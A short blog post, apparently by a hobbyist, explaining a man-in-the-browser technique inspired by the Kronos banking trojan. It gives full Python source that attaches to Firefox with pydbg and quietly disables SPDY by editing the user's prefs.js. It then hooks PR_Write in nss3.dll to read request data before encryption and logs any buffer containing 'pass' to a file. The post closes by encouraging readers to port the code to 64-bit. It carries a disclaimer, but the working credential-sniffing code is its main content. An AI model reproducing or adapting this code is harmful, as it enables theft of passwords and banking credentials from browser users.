Man in the browser on Firefox
What a beautiful Sunday!
Right now in Italy it's snowing, so what to do during these days?
Obviously talk about some Malware Techniques.
Will you remember about summer's scandal called "Kronos banking trojan"?
Well I'm not going into details, but in that moment my question was: Could I be able to develop such feature?
The answer is yes!
The only purpose of this article is to illustrate how bad guys develop their malicious software.
I don't take any responsibility about illegal actions carried out by readers.
Curiosity is how software works, not how to damage others!
While I was studying Gray Hat Python written by Justin Seitz, there was one capther called "Hooking".
Hooking is the software ability to attach software, like a debugger, thus intercepting functions calls.
Man-In-The-Browser is this, simply, in conjuction with the ability to read pre-encrypted traffic.
The source code showed in this book does not work anymore; anyway I'm able to adapt the code on the latest version of Firefox 32bit.
Firefox exports the function which deals with request encryption, so it's very simple to accomplish our task.
You will need to install pydbg library by your own to follow this article.
nss3.dll contains PR_Write function that is useful for our purpose, furthermore We need to disable SPDY for simplify hooking process.
Here the final source code:
from pydbg import * from pydbg.defines import * import struct import utils import sys import os dbg = pydbg() debug = Debug() found_firefox = False def ssl_sniff( dbg, args ): buffer = "" offset = 0 while 1: byte = dbg.read_process_memory( args + offset, 1 ) if byte != "x00": buffer += byte offset += 1 continue else: break if "pass" in buffer: print("[!] Found") out = open("log.txt","a") out.write(buffer) out.close() return DBG_CONTINUE for (pid, name) in debug.system.scan_processes(): if name.lower() == "firefox.exe": # Disable SPDY path = os.path.join(os.path.join(os.environ['USERPROFILE']), "AppData\Roaming\Mozilla\Firefox\Profiles") for directory in os.listdir(path): path = os.path.join(path, directory+"\prefs.js") f = open(path, "a") f.write("user_pref("network.http.spdy.enabled", false);") f.write("user_pref("network.http.spdy.enabled.http2", false);") f.close() found_firefox = True hooks = utils.hook_container() dbg.attach(pid) print("[*] Attaching to firefox.exe with PID: %d" % pid) hook_address = dbg.func_resolve_debuggee("nss3.dll","PR_Write") if hook_address: hooks.add( dbg, hook_address, 2, ssl_sniff, None) print("[*] PR_Write hooked at: 0x%08x" % hook_address) break else: print("[*] Error: Couldn't resolve hook address.") sys.exit(-1) if found_firefox: print("[*] Hooks set, continuing process.") dbg.run() else: print("[*] Error: Couldn't find the firefox.exe process. Please fire up firefox first.") sys.exit(-1)Take time to study this code and you could be able to adapt it on 64bit version too.
To the next article, have a good Sunday!